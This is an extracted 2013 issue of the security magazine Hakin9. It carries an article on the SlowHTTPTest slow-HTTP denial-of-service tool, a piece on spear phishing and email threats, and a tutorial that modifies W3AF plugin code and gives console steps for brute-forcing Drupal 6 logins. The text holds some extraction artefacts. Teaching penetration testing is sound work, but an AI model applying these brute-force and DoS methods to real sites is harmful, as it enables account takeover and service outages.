Europe’s No.1 Information Security Event
SECURE THINKING SECURE BUSINESS
Why AttENd INFOSECURIty EUROPE 2013? Access Europe’s most extensive & free to attend knowledge enhancing educational programme Meet over 300 leading information security suppliers – identify best of breed, cutting edge technology & see real solutions in action Hear from real experts & respected public & private sector IT practitioners to discover how they spent their budget on the right products, services and solutions Network with your peers through a wide range of activities including workshops & evening receptions Earn CPE credits by attending the free educational programme
Register for FREE at infosec.co.uk/register * * Visitor registration is free online before Friday 19th April at 5pm. Onsite registration £20.
Organised by:
Follow us @infosecurity
23-25 April 2013 Earls Court London UK
PRACTICAL PROTECTION IT SECURITY MAGAZINE
Dear Hakin9 Readers,
Editor in Chief: Dagmara Gładyś dagmara.gladys@hakin9.org
team
Editors: John Webb, Marco Hermans, Gareth Watters Proofreaders: Jeff Smith, Oleksandr Bevz, Krzysztof Samborski Special Thanks to the Beta testers and Proofreaders who helped us with this issue. Without their assistance there would not be a Hakin9 magazine. Senior Consultant/Publisher: Paweł Marciniak CEO: Ewa Dudzic ewa.dudzic@hakin9.org Production Director: Andrzej Kuca andrzej.kuca@hakin9.org DTP: Ireneusz Pogroszewski Art Director: Ireneusz Pogroszewski ireneusz.pogroszewski@software.com.pl Marketing Director: Oleksandr Bevz dagmara.gladys@hakin9.org Publisher: Software Press Sp. z o.o. SK 02-682 Warszawa, ul. Bokserska 1 Phone: 1 917 338 3631 www.hakin9.org/en Whilst every effort has been made to ensure the highest quality of the magazine, the editors make no warranty, expressed or implied, concerning the results of the content’s usage. All trademarks presented in the magazine were used for informative purposes only. All rights to trade marks presented in the magazine are reserved by the companies which own them.
DISCLAIMER!
The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.
4
T
his month’s issue supplies you with the articles that are yet to be published in the forthcoming magazines. We would like to draw your attention to the best quality content of these publications and grant you with a couple of articles representing all the topics covered in February. Hakin9 Extra with its Backtrack 5 r3 Guide can surely be regarded as this month’s hit. You can seize the opportunity of reading two articles about Backtrack by Alex Kah (Backtrack Linux – How to Ditch the Menu and Ball from the Command Line?) and Kevin Simons (How to Brute-force Drupal6 Login Pages?). The complete issue on Backtrack will be published this week. Next week’s publication will be devoted to yet another facet of Cyber Security in the articles of William F. Slater, III. You surely noted that this year’s Hakin9 OnDemand is being published as a series of issues focused on Cyber Security. This month, you can read about The Rise and Fall of Megaupload. com and Kim Dotcom. You can also learn a lot about our leading Cyber Security expert, William F. Slater, from the interview with him. Last week of February is booked for Exploiting Software and this month’s topic How to Penetrate with Metasploit? We decided to address the topic as we noted your interest in the Metasploit In A Nuttshel issue http://hakin9.org/metasploit-withnessus-and-backtrack-in-exploiting-software-0912/, published last October. We would like to remind you about the best articles from that publication. These are How to use Sqlploit? by George Karpouzas and How to Explore the IPv6 Attack Surface with Metasploit? by Mike Sheward. This month, we would like to focus on specific methods of penetration using Metasploit. We hope we managed to meet your expectations as far as the content of February’s issues is concerned . Please, feel free to share your views about that, you are free to send us a message to en@hakin9.org. Dagmara Gładyś Hakin9 Editor and Hakin9 team
02/2013
CONTENTS
Hakin9
Stimulating Application Layer Denial of Service attacks with SlowHTTPTest 06 By Sergey Shekyan Slow HTTP attacks are denial-of-service (DoS) attacks that rely on the fact that the HTTP protocol, by design, requires a request to be completely received by the server before it is processed. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. When the server’s concurrent connection pool reaches its maximum, this creates a denial of service.
How to Combat Email-Based Threats to Business Continuity with Trusted Sender Recognition? 08 By Elizabeth Botes Though mature and capable, the spam filters and anti-virus solutions that organizations currently rely on to counter email-based threats are quite simply not enough as new threats emerge. These threats can – and do – result in the theft of intellectual property, large sums of money being stolen and other serious disruptions that can significantly impact both day-to-day and long-term business operations.
Hakin9 Extra
Backtrack Linux – How to Ditch the Menu and Ball from the Command Line? 12 By Alex Kah Backtrack Linux has become more popular over the years as businesses had been losing money because of data breaches through malware infections or targeted attacks. The media has caught on and realized that these breaches are not only fascinating to the businesses themselves or the so called nerds or geeks that resolve their issues but the general public is interested in these data breaches which makes Information Security huge news in 2013. The end result is a snowball effect that appears to only be picking up steam.
How to Brute-force Drupal6 Login Pages?
20
By Kevin Simons Authentication is a protocol or process that allows an entity or system to validate your identity. Back in the early days of computers, operating systems were using a password model to verify the user. The password model consists of a user name and a password. Nowadays, we see
www.hakin9.org/en
a variety of authentication protocols/processes. We have biometrics, a system that validates your identity based on, for example, your face or your fingerprint, which both can be fooled. However scientists are working on a system that scans your veins, and that looks promising.
Hakin9 OnDemand
The Rise and Fall of Megaupload.com and Kim Dotcom 28 By William F. Slater, III In January 2012 the U. S. Government took down the Megauploads.com website and then quickly filed charges against the owner, Kim Dotcom, and his colleagues for alleged “copyright infringement, conspiracy to commit money laundering, racketeering, rewarding users who uploaded pirated content for sharing, and turning a blind eye to requests from copyright holders to remove copyright-protected files.”
An Interview with William F. Slater, III
32
By Ewa Duranc Currently, I am a freelance Sr. IT Consultant and IT Project Manager. At this moment, I am actively engaged in working on and managing an exciting Fast-Track ISO 27001 Implementation Project. You can see other information about my career and things like certifications at this link: http://billslater.com/interview.
Hakin9 Exploiting Software How to Use Sqlploit?
36
By George Karpouzas Databases nowdays are everywhere, from the smallest desktop applications to the largest web sites such as Facebook. Critical business information are stored in database servers that are often poorly secured. Someone with access to this information could have control over a company’s or an organization’s infrastructure. He could even sell this information to company’s competitors.
How to Explore the IPv6 Attack Surface with Metasploit? 44 By Mike Sheward IPv6 is often described as a parallel universe, co-existing alongside existing IPv4 infrastructure in a bid to ease the transition process. Often left unmanaged and unmonitored in networks, those IPv6 packets could provide a great opportunity for the savvy attacker. Thanks to the Metasploit framework, exploring the IPv6 attack surface has become a lot easier.
5
Hakin9
Stimulating Application Layer Denial of Service attacks with SlowHTTPTest Slow HTTP attacks are denial-of-service (DoS) attacks that rely on the fact that the HTTP protocol, by design, requires a request to be completely received by the server before it is processed.
I
f an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. When the server’s concurrent connection pool reaches its maximum, this creates a denial of service. These attacks are problematic because they are easy to execute, i.e. they can be executed with minimal resources from the attacking machine and are hard to detect, because they generate close to legitimate very low-rate traffic. Another interesting type of attack that is related to slow concept is slow read DOS attack. The idea of the attack is pretty simple: Bypass policies that filter slow-deciding customers, send a legitimate HTTP request and read the response slowly, aiming to keep active as many connections as possible. It is different from above mentioned attacks by the attack vector: instead of fooling the server on application layer, it manipulates the TCP receive window size, making underlying layer on server side to slow down the outgoing data. One of the most popular DoS tools according to Imperva’s research is slowhttptest: a tool that implements all mentioned attacks. Slowhttptest opens and maintains customizable slow connections to a target server, giving you a picture of the server’s limitations and weaknesses. The output could vary from heart-bit messages to the stdout to entire test statistics in CSV format to HTML-formatted charts. Web proxy support could be used to either direct entire test traffic through an arbitrary proxy server, or only traffic of probe connection, that collects statistics about server availability independently from main attack source. The tool is distributed as portable package, so just download the latest tarball from the project page, extract, configure, compile, and install:
$ $ $ $ $
6
tar -xzvf slowhttptest-x.x.tar.gz cd slowhttptest-x.x ./configure --prefix=PREFIX make sudo make install
It compiles and works on any Linux platform, as well as OSX and even Cygwin, if you are really desperate running it on a Windows box. The only prerequisite is to have openssl-dev, so make sure you got it from your favorite package manager before building the tool. You can find all kinds of examples either in projects’ wiki, or in the manual page, which is installed with the package and can be accessed the usual way: $ man slowhttptest
Due to simple unawareness, many people are fooled by configuration files distributed with the Web servers. Slow attacks should be haldled and minimized. And vendors creating distribution packages for Web servers should focus more on such control. But so far, make sure you test your setup before trusting it completely.
Sergey Shekyan
Sergey Shekyan is a Senior Software Engineer for Qualys, where he is focused on development of the company's on demand web application scanning service. With more than 10 years of experience in software design, development, testing and documentation, Sergey has contributed key product enhancements and software modules to various companies. Prior to Qualys, he designed and implemented a web-based system for general aviation pilots. As a senior software engineer for Navis, he contributed to projects involving development of container terminal operating systems (TOS) simulation software. He also designed and developed data analysis software modules for Virage Logic, a provider of semiconductor IP for the design of complex integrated circuits. Prior to working at Virage Logic, he developed manufacturing test program generation software for Credence Systems Corporation. Sergey holds both Masters and BS Degrees in Computer Engineering from the State Engineering University of Armenia. Twitter: @sshekyan
02/2013
IT Security Courses and Trainings IMF Academy is specialised in providing business information by means of distance learning courses and trainings. Below you find an overview of our IT security courses and trainings. Certified ISO27005 Risk Manager Learn the Best Practices in Information Security Risk Management with ISO 27005 and become Certified ISO 27005 Risk Manager with this 3-day training! CompTIA Cloud Essentials Professional This 2-day Cloud Computing in-company training will qualify you for the vendorneutral international CompTIA Cloud Essentials Professional (CEP) certificate. Cloud Security (CCSK) 2-day training preparing you for the Certificate of Cloud Security Knowledge (CCSK), the industry’s first vendor-independent cloud security certification from the Cloud Security Alliance (CSA). e-Security Learn in 9 lessons how to create and implement a best-practice e-security policy!
Information Security Management Improve every aspect of your information security! SABSA Foundation The 5-day SABSA Foundation training provides a thorough coverage of the knowlegde required for the SABSA Foundation level certificate. SABSA Advanced The SABSA Advanced trainings will qualify you for the SABSA Practitioner certificate in Risk Assurance & Governance, Service Excellence and/or Architectural Design. You will be awarded with the title SABSA Chartered Practitioner (SCP). TOGAF 9 and ArchiMate Foundation After completing this absolutely unique distance learning course and passing the necessary exams, you will receive the TOGAF 9 Foundation (Level 1) and ArchiMate Foundation certificate.
For more information or to request the brochure please visit our website: http://www.imfacademy.com/partner/hakin9 IMF Academy info@imfacademy.com Tel: +31 (0)40 246 02 20 Fax: +31 (0)40 246 00 17
Hakin9
Combat EmailBased Threads to Business Continuity With Trusted Sender Recognition Though mature and capable, the spam filters and anti-virus solutions that organizations currently rely on to counter emailbased threats are quite simply not enough as new threats emerge. These threats can – and do – result in the theft of intellectual property, large sums of money being stolen and other serious disruptions that can significantly impact both dayto-day and long-term business operations. What you will learn…
What you should know…
• The profile of Spear Phishing Attacks • How the attacks impact business
• Have basic computer knowledge
D
espite the best efforts of IT organizations, spam filters and anti-virus solutions are illsuited to combatting carefully-crafted spear phishing messages, potentially crippling distributed denial of service (DDoS) attacks and the latest threat: “Social DDoS” attacks, which target specific individuals. Additionally, spam filters and anti-virus solutions can cause their own issues that must be addressed. Most notably, overzealous spam filters far too often quarantine legitimate – often businesscritical and time-sensitive – emails, a phenomenon commonly known as email “false positives.”
abling individuals and groups to work efficiently to execute critical business process throughout an organization. The loss – or even just the delay – of
Identity, Reputation and Authentication
Recognizing these limitations of spam filters and anti-virus solutions, industry visionaries are pioneering Messaging Intelligence platforms, nextgeneration solutions for ensuring the security, integrity and reliability of the messaging systems that organizations rely upon. At the heart of Messaging Intelligence platforms is the ability for making realtime decisions about email communications by triangulating a sender’s identity and reputation with email authentication.
Solving the Email False Positive Dilemma
The impact of false positives can be substantial now that email is the most important and fundamental method of communication in today’s enterprise, en-
8
02/2013
critical emails results in missed sales opportunities, irritated customers and other situations that can disrupt business operations and impact a company’s reputation. The respected analyst firm Osterman Research estimates that false positives cost organizations as much as US$230 per employee annually. Most analyst firms agree that the acceptable number of false positives is 3.5 messages per million (the six sigma multiplier) or less. But after analyzing hundreds of millions of emails at enterprises across North America, TrustSphere finds the average number of false positives to be in excess of 5,000 messages per million – with some organizations well beyond that.
Preventing Spear Phishing Attacks
Spear phishing is a more targeted form of phishing, in which specific individuals in an organization are targeted in order to steal valuable data. Recent high-profile breaches in several public companies and government agencies have caused growing concerns about the use of fraudulent email as part of targeted attacks. RSA, one of the world’s preeminent security and encryption companies, was itself hacked in March 2011, rendering many of its popular SecurID tags less secure. Attackers simply sent e-mails with the subject line “2011 Recruitment Plan” to selected RSA employees. One of the targeted employees opened the Excel file attached to the e-mail setting loose a program that let the attacker control the employee’s PC. In general, spear phishing attacks aim to achieve high value outcomes such as the disclosure of commercially sensitive information, manipulation of stock prices, corporate or national espionage, or gaining access to secured systems. For example, by the time Quad/Graphics approached Condé Nast, for payment in December 2010, the media giant (publishers of Vogue, Golf Digest, GQ, Vanity Fair, The New Yorker, Wired, etc) had already paid nearly US$8 million into the account of a spear phisher posing as Quad/ Graphics. Condé Nast’s accounts payable department had received a single email claiming to be from Quad/Graphics, a company that prints Condé Nast’s magazines, instructing them to send payments to a bank account specified in the email, accompanied by an electronic payment authorisation form. Once the form was authorised, Condé Nast effectively gave permission for their bank, JP Morgan Chase, to deposit funds in the account – which turned out to be fake. While most media focus on headline-grabbing spear phishing incidents like Condé Nast and assume such incidents to be few and far between,
www.hakin9.org/en
Hakin9
the reality is they occur all the time. One industry analyst estimates the cost of each successful spear phishing attack at US$160,000. As the email messages required for conventional phishing attacks are sent unsolicited and in bulk, conventional spam detection techniques can be used to identify them relatively successfully. Spear phishing attacks, however, are more carefully crafted: the attacker studies an individual victim – usually an executive in a large organization – and builds an email message specific to that victim using social engineering techniques. The spear phishing email typically appears to be from someone known to the victim and on a topic that the person and the victim are likely to communicate about. Because of this, traditional spam filters afford virtually no protection against spear phishing attacks. Fortunately, these sophisticated and hyper-personalized attacks can be effectively countered by the identity and reputation analysis matched with emailed authentication of Messaging Intelligence platforms. By accurately assessing the sender’s reputation, recipients can be alerted to cautiously examine any suspect messages that cannot be verified as coming from the purported sender.
legitimate messages and prioritizing them for immediately delivery so that operations can continue normally. This dramatically reduces the impact to business operations of DDoS attacks.
Social DDoS: When 99% Target one Person
Social DDoS attacks first came to light during the Occupy Wall Street movement. In a social DDoS attack, hundreds or thousands of individuals email a target executive – either simultaneously or over a short time period – to in essence “occupy” the target’s in box. This attack effectively renders the target’s email account useless as these messages are delivered en masse. The actual impact of Social DDoS attacks is hard to gauge. While some executive targets claim to suffer only a minor inconvenience, the disruption to an organization’s day-to-day operations can be extensive, particularly if multiple executives are attacked at the same time. Again, spam filters and anti-virus solutions are useless to defend against this new type of attack. Because the messages come from individual senders and contain no language that can alert a spam filter, the messages are delivered en masse.
Mitigating DDoS Attacks
Financial institutions, enterprises, governments, service providers and educational institutions have all been targets of DDoS attacks, one of the more popular methods for criminals and activists to disrupt an organization’s ability to function. Initially, cyber criminals were the primary launchers of DDoS attacks, extorting companies with the threat of massive attack, but since the hacker group Anonymous launched its “Operation Payback” campaign to avenge Wikileaks punishment, DDoS attacks have become largely socially motivated. In addition to web and application services being brought to their knees, email – the lifeblood of an organization – is also often crippled. Traditionally, IT departments’ first response steps include locking down access through the firewall. This results in organizations’ communications being brought to a virtual standstill, while security specialists work to mitigate the attack. During the time it takes to fully remedy the attack, critical messages are delayed or lost, crippling productivity and harming reputations. A valuable component in mitigating a DDoS attack is to enable and keep trusted communication flowing. Identity and reputation email authentication management enables just this by identifying
10
Elizabeth Botes
Elizabeth Botes, Vice President, Marketing. Elizabeth Botes is a high-tech industry veteran with more than 15 years of managerial and channel marketing experience. Prior to joining TrustSphere, Elizabeth held a variety of senior management positions, including most recently serving as president of Brisbane Digital Consulting Group. Her experience also includes developing the global distribution channels for Terayon (Motorola), a $300 million manufacturer of broadband video, voice and data solutions, and senior management positions at Aethra (Radvision) and Polycom. Her tenure at Polycom began shortly after its founding and she was responsible for building its channel and international sales strategies, helping to grow the company to more than $500 million in revenues.
02/2013
Big Data gets real at Big Data TechCon! The HOW-TO conference for Big Data and IT Professionals Discover how to master Big Data from real-world practitioners – instructors who work in the trenches and can teach you from real-world experience!
Come to Big Data TechCon to learn the best ways to: • Collect, sort and store massive quantities of structured and unstructured data • Process real-time data pouring into your organization
Ovheowr-t5o 0
s l classe practicaorkshops and w oose • Master Big Data tools and to ch ! from technologies like Hadoop, Map/Reduce, NoSQL databases, and more • Learn HOW TO integrate data-collection technologies with analysis and business-analysis tools to produce the kind of workable information and reports your organization needs • Understand HOW TO leverage Big Data to help your organization today
April 8-10, 2013 Boston, MA
www.BigDataTechCon.com
Register Early and SAVE! A BZ Media Event Big Data TechCon™ is a trademark of BZ Media LLC.
Hakin9 Extra
How to Brute-force Drupal6 Login Pages? Authentication is a protocol or process that allows an entity or system to validate your identity. Back in the early days of computers, operating systems where using a password model to verify the user. The password model consists of a user name and a password. Nowadays, we see a variety of authentication protocols/processes.
W
e have biometrics, a system that validates your identity based on, for example, your face or your fingerprint, which both can be fooled. However scientists are working on a system that scans your veins, and that looks promising. We also have two-factor authentication which basically comes to identification based on what you know (pin) and what you have (bank card). But with online banking systems it might even go further and you end up with multiple factor authentication. In order to purchase merchandise online you now need to provide a card number and a verification code. Then you are routed to a third party system, like for example Ogone, to validate your payment. That system will contact your bank, usually through a web service, to show you the required procedure to validate the payment. Usually, it comes to either using a digipass system or a bank card system that provides you with a onetime pin of usually 8 characters. If I look back at how I did payments online a year ago, I only needed to provide my card number and the verification code. I'm glad that the authentication process was adapted because you can easily generate a visa/ mastercard number and then you probably could guess by bruteforcing the verification code. Today we will be looking at the password model, which are the simplest authentication models to implement.
The password model implementation
The password model exists for ages and is heavily used. Think of CMS systems, OS logins, router logins, SSH, FTP, and even most web applications. And even though it is simple to implement, a lot of developers forget to implement the login
12
lockout procedure. Hours before I started writing this article, Symantec wrote a white-paper that stated that 59% of all public websites are vulnerable for brute-forcing. A password model is basically composed of a password (or a pass code, which is for example a PIN code) and a user name or ID, however there are a lot of systems that don't allow you to choose the administrator user name, which leaves you with just a password and a user name which is either admin or administrator. Other systems provide you with the freedom of also choosing the administrator user name. A fairly secure password model would be one, that also provides a lockout mechanism after a certain amount of retries. It's best to keep this as low as possible. If the user locks himself out he is forced to call the administrator/administration department to unlock his user/badge or in the case of a cell phone he can also use his PUK code. Some systems let you retry a couple of times, after some time has passed (eg. 6 hours wait time). To verify the password, a user who has entered a system must also store the password. Even though you would expect that the saved password is encrypted, some systems still store the password in clear text. Other systems hash the password and others use a symmetric encryption algorithm. I won't go into detail about the security of those implementations.
Insecurity of a password model
Suppose that you have a system that doesn't have a lockout mechanism implemented, how are you sure that you are secure? I often hear a lot of administrators tell their users that they are
02/2013
How to Brute-force Drupal6 Login Pages
safe if they use a password of minimum 8 characters, with a mix of upper and lower case letters, a special character like for example the @ and a number. And usually that user then forms a password that is quiet predictable. He will use an upper case letter as the first, then some lower case letters and he will probably replace the a by the @. Eventually he will finish his password with a number. So a possible password would be “H@ttrick1.” But it even gets worse - usually crackers also know that if they have found this password, and after some time the user changes his login password, he usually will just add 1 up to the number. So after a month or two, the password will become “H@ttrick2.” Shortly said users are lazy and not interested in security. They even are so lazy that they will write on a post-it their user ID and their password which leads to another possible threat, namely the insider attack. And if you think that things couldn't get worse, just think back of a very old system called the mainframe. Usually the authentication happens over FTP (so plain text), the character set is restricted (so you can forget about using a lot of special characters) and depending on how you are communicating you might end up with all uppercase characters. And if you thought this wasn't enough, you are restricted to 8 characters. However, you don't hear a lot about security breaches on mainframes or the password authentication model. There are two reasons for this. The first is that before you reach the mainframe you have to do a lot to invade the perimeter zones. And secondly, you are usually logged by IPS/IDS/ SIEM/WAF software systems. But I did say usually. A lot of SMBs didn't install IPS/IDS or even SIEM software systems. The result ends into a system that did log the brute-forcing, but an administrator that wasn't aware of the brute-forcing. And if we look at web (application) logins, it even gets worse. But even the large three letter companies might have suffered from brute-force attacks. Usually, they do have the software to log it, but it just went unnoticed. A decent system not only logs, but also warns the system administrator. There are several software packages that do this, including a SIEM solution or BFD (Brute Force Detection) software. But what do you do when you see it? Shut down the network? Keep it up? An important question to ask. Large companies? Yes, well, in this case, a large four letter company named Sony just got fined, hours before I started writing this article, by the UK for £250.000. On 12th October 2011 Sony suf-
www.hakin9.org/en
fered from a massive brute-forcing attack on the Playstation and Sony network accounts. The result: 60.000 Playstation network accounts and 33.000 Sony Online Entertainment network accounts compromised. This happened just months after the April Playstation Hack exposing over 77 million accounts! And to quote Symantec: “Overall, the IT managers we surveyed seembullishly confident about website security. 19% of respondents told us that their corporate websites are totally secure. A further 55% describe their sites as very secure. Not one of the IT managers we surveyed told us that their companies' sites were insecure.”
Brute-force techniques
There are several brute-force techniques. First, you have the dictionary attack, where you have a file preloaded with passwords. You can also have a file containing famous names. Then, you have the heuristic approach where you first are trying to figure out how long the maximum user name/password is. On websites, this is fairly easy because they usually add a text size attribute. This can then be used to narrow down all the possibilities. You can also use credential recycling where you re-use previous user name/password combinations that you found on the victims environment. And the last approach is the full blown brute-forcing techniques till the end. On top of the techniques, you also have other parameters to speed up the process. You can use the GPU for example. You can do a parallel attack, where you are injecting the target via multiple computers. You can use ranges, for example Computer 1 injects via passwords up to 5. Computer 2 starts injecting from 6 to 8. Computer 3 has yet another range. And you can even create ranges for user names and passwords. And crackers usually also have the help of botnets. A complete interconnected system of compromised computer systems (zombies) who interact with their own intelligence servers, command and control servers and malware update servers. And if that wasn't just enough strength, Since 16th November 2012 researchers, scientists, engineers, security analysts and cyber criminals are aware that quantum computers are able to carry out calculations billions times faster than today's most powerful machines. Still on this day RSA encryption is still safe, because the largest factorized number was 21, via Peter Shor's Algorithm (http:// en.wikipedia.org/wiki/Shor%27s_algorithm). But you can keep in mind that sooner or later those computers will break RSA so fast that it can be
13
Hakin9 Extra
considered unsafe. So people can start to think for better encryption techniques.
Time needed for a brute-force today
Security researcher Thomas Roth figured out an (illegal) inexpensive way to break password protected wireless networks. He wrote software that ran on Amazon's cloud environment, resulting in 400.000 passwords tested every second. This means that every business network and home network with relatively simple passwords and no lockout mechanism can be easily compromised. 50 super computers, with a capacity of 20 PetaFLOPS, that wants to break the 256-bit AES symmetric key would in theory require 3Ă—1051 years. But if there is a flaw in the pseudo random generator the key space might just not use the full 256bit key space. Netscape's SSL implementation and Ubuntu's OpenSSL implementation where both flawed because of this. Suppose you have a system that can produce 15 million tries per second. We just assume to have a complex password with numbers and special characters, as well as upper and lower case characters. How long will it take? 6 places: 11 hours, 7 places: 6 weeks, 8 places: 10 years, 9 places: 1000 years, 10 places: 1700 years. A dual core processor with GPU can produce up to 10 million tries per second, however the current workstations can already produce up to 100 million tries per second. Supercomputers and distributed computing environments can produce over 1 bil-
lion tries. RC5-72 for example can produce over 800 billion tries per second. Do you think you’re safe with a password of 8 places? Guess again. Cyber criminals using the strength of their botnets would crack even your 10 places password in just a few months, instead of 1700 years. And if you look at the compromised accounts earlier, it just figures that a lot of users just don't use a complex 10 places password. Instead of using pass codes, passwords, user IDs, and usernames, start to use pass phrases for both the user and the password.
W3AF
W3AF is a Web Application Attack and Audit Framework. It helps you by finding and exploiting all web application vulnerabilities. It is developed under GPLv2 license using the Python language. The project also has short and long term objectives. One of those objectives is to become the best open source web application scanner. The objective is promising, but once you enter the brute force area you'll see that a lot of those web application scanners suffer from false positives and false negatives. So let's check how well it behaves on a Drupal version 6.28 installation.
W3AF Form Brute-force plugin
I'll explain in this section how to configure the form brute-force plugin via W3AF GUI and W3AF Console. Let's start with the GUI first.
Figure 1. Configuration screen for a web audit
14
02/2013
How to Brute-force Drupal6 Login Pages
You'll find both programs under Applications>B ackTrack>Vulnerability Assessment>Web Application Assessment>Web Vulnerability Scanners. If you launch the GUI, you'll see a lot of things. The first page you see is the scan config. On the left you have the profiles. Next to it you can fill in a target URL and select all the plugins you want to use. And on the right you have “Start” (scanning) button and a button to perform advanced target operations, as well as the configuration parameters for the selected plugin. Above the different tabs you have some shortcut buttons (Figure 1). On the left, you can select some preconfigured profiles. The OWASP_TOP10 for example will select all plugins to perform an audit/attack against the top 10 vulnerabilities according to OWASP. We will create an empty profile by clicking on the second button above the tabs. Now fill in your target URL: http://localhost/drupal6/. If you click on the Advanced Target URL Configuration button you can additionally select an operating system (Unix/Windows) and a framework like for example PHP, Java, JSP, ASP, and more. For the demo, we'll leave this empty and just click the close button (Figure 2). Next, we'll select our plugins. Since we want to test a form against brute-forcing, we go to bruteforce, click on the plus sign, and select formAuthBrute. Then, we go to the right and scroll all the way down. Here we configure our plugin. You can specify a username file, which is a text based file with users. You can specify a password
Figure 2. Advanced target settings in W3AF
file as well. You may also just specify a combined file where you separated the username from the password with a separator. If you use this file, you must also specify the separator in comboSeparator. For the demo, we just use a username file and a password file. You can download a password file, or create your own. BackTrack also comes with 2 password list files. You can find them under file sy stem>pentest>passwords>wordlists. The plugin can also use data which it found during the scan. For the demo, we deselect them and only enable the stopOnFirst, which configures the plugin that it will stop after the first successful login. First, I will shortly explain the other options: • • • •
• •
useMailUsers:
if other plugins found an email, this plugin will strip the email and will just use the first part for a user name userSvnUsers: the same as useMailUsers, but it will fetch the data from SVN headers. passEqUser: as the name says, it will use the user names also as a password useLeetPasswd: this configuration option will alter the password into a Leet Speak Password. An example: if the original password was “demo,” it will also try “d3m0.” Unfortunately it will not try “d3mo” or “[)3|\/|0.” It will only replace the characters with numbers in an all or nothing way. useMails: this option is like useMailUsers, but instead of stripping the user from the email, it will use the entire email address as a user. useProfiling: this option uses a list of passwords that was generated by the passwordProfiling plugin. The passwordProfiling plugin is a plugin that generates a list of possible passwords by reading the responses and counting the most common words. The password list is limited via the profilingNumber option.
Now you can start scanning the Drupal installation. For the demo, I used a short list of user-
Figure 3. Tamper Data example of unsuccessful login
www.hakin9.org/en
Figure 4. Tamper Data example of successful login
15
Hakin9 Extra
names and passwords. If you run the scan, you'll see that W3AF won't find a possible password. But as I said before, the biggest problem with brute-forcing plugins is that they generate false positives and false negatives. So now that you know that this can't be true, let's do some digging. First check how the code works. Select the Scan Config tab, right click on the formAuthBrute plugin and select Edit plugin. It's the python code written by Andres Riancho in 2006. To save you all the trouble, just have a look at _matchesFailedLogin, he basically checks for a similarity. But apparently that doesn't work in our case. Secondly, have a look at _true_extra_fields. Andres sets all the other fields to 1 instead of its original value. He explains why as well, but I think this should be limited to check boxes only.
Now let's see how Drupal behaves on a positive login and a negative login. Even though this can be done via proxy, I usually just use Tamper Data for this. Install the tamper data plugin for FireFox. Go to your Drupal installation. Now before you log in, start tamper data by clicking Tools>Tamper Data. Then click on Start Tamper. Now type in a as user name and b as password. Then a pop-up from Tamper Data will show and select submit. Now go to Tamper Data and click on Stop Tamper. Go all the way up to your POST message. See the return code of 200, which means OK (Figure 3). Now do the same but with a successful login. See that status a 302. Meaning Found? Nice. Think you can do the trick based on return codes? Wrong. I tried. W3AF will respond all the way with 200 HTTP response codes (Figure 4).
Listing 1. _matchesFailedLogin method rewritten to work with Drupal
def _matchesFailedLogin(self, resp_body): ''' @return: True if the resp_body matches the previously created responses that are stored in self._login_failed_result_list. lfrl = self._login_failed_result_list # 0.65 gives a good measure of similarity if relative_distance_ge(resp_body, lfrl[0], 0.65) or \ relative_distance_ge(resp_body, lfrl[1], 0.65): return True else: # I'm happy! The response_body *IS NOT* a failed login page. return False '''
#Replaced above code by Kevin Simons for Hakin9 Drupal Demo, expected result is an error message with the text below if '<div class="messages error">' in resp_body: return True else: return False
Listing 2. _matchesFailedLogin method user/password information
16
def _do_req_without_cookies(fuzz_req): url = fuzz_reED:getURI() data = fuzz_reED:getData() headers = fuzz_reED:getHeaders() # Typically GET and POST meth = getattr(xUrllib(), fuzz_reED:getMethod().upper()) om.out.information(data) resp = meth(url, data, headers, grep=False, cache=False) return resp
02/2013
How to Brute-force Drupal6 Login Pages
So what I did was I started looking inside the body for something specific. And there is was: <div class="messages error">. This wasn't in the body on a successful login. Now it's time to adapt the coding.
Remember we don't have check boxes and we don't want our other fields to be changed (otherwise it won't work). A bit underneath comment certain lines. This is the final result of that piece of code (Listing 3).
Adapt the code for a successful brute-force
In the method audit comment this line, we don't need itself._idFailedLoginPage(freq). Then go to method _matchesFailedLogin and comment everything. We are going to rewrite this method so that it works with our Drupal installation. This is now our method: Listing 1. In method _bruteWorker also comment this line: data_container = self._true_extra_fields(data_ container)
In that same method you can add information to check what user/password it is sending. Here is the final result of that part: Listing 2.
Figure 5. Example of a successful attack
Listing 3. Final result of the _matchesFailedLogin method
# TODO: This is a *hack*. This logic shouldn't be implemented # in the plugin but in xUrllib try: resp = _do_req_without_cookies(freq) except w3afMustStopOnUrlError: return body = resp.getBody() # Edited by Kevin Simons for Hakin9 Drupal Demo. We don't want the body to be replaced # body = body.replace(username, '').replace(userpwd, '')
with self._plugin_lock: if not self._matchesFailedLogin(body): # Ok, this might be a valid combination. # Now test with a new invalid password to ensure our # previous possible found credentials are valid # Edited by Kevin Simons for Hakin9 Drupal Demo. Useless rubbish in our case # data_container[self._passwd_field_name][0] = \ # createRandAlNum(8) # freED:setDc(data_container) # verif_resp = _do_req_without_cookies(freq) # body = verif_resp.getBody() # body = body.replace(username, '').replace(userpwd, '')
# if self._matchesFailedLogin(body): self._found = True freq_url = freED:getURL()
www.hakin9.org/en
17
Hakin9 Extra
Re-launch the brute-force login scan and analyze the results
If you don't want to use the GUI, you can use the console. Go to Applications>BackTrack >Vulnerability Assessment>Web Application Assessment>Web Vulnerability Scanners and start w3af console. This will open a terminal. Type “plugins” to go to the plugins. Now type “bruteforce formAuthBrute.” This command will enable the form brute-forcing plugin. If you forgot about the name, you can use the tab command to get
the different plugins (as I did). Verify that the plugin is enable by retyping the command “bruteforce” (Figure 6). Now let's configure the plugin. Type “bruteforce config formAuthBrute” to view the default settings type view (Figure 7). Now remember that we didn't want to use the options, except stopOnFirst. To change the value type set <option> false, where you change <option> into the option name. If you want to change the path of a file, just type set <option> <path> (Figure 8). Now that you have configured the plugins, it's time to prepare the output. Type “back” to leave the plugin configuration and then type “output console, textFile” to generate output to both the console and a text file. Then, type “output configuration textFile” to configure the settings for the textFile. First, set a path where the file should be created. In my case, it is set to the root directory by typing set fileName /root/result.txt. Then, set it's verbose mode by typing “set verbose True.” Then configure the console. Type “back” followed by “output configuration console.” Then type “set verbose True (Figure 9).”
Figure 6. Enabling the fFormAuthBrute plugin via console
Figure 8. Setting the options for the plugin
Figure 7. Viewing the options for the formAuthBrute plugin
Figure 9. Setting output options
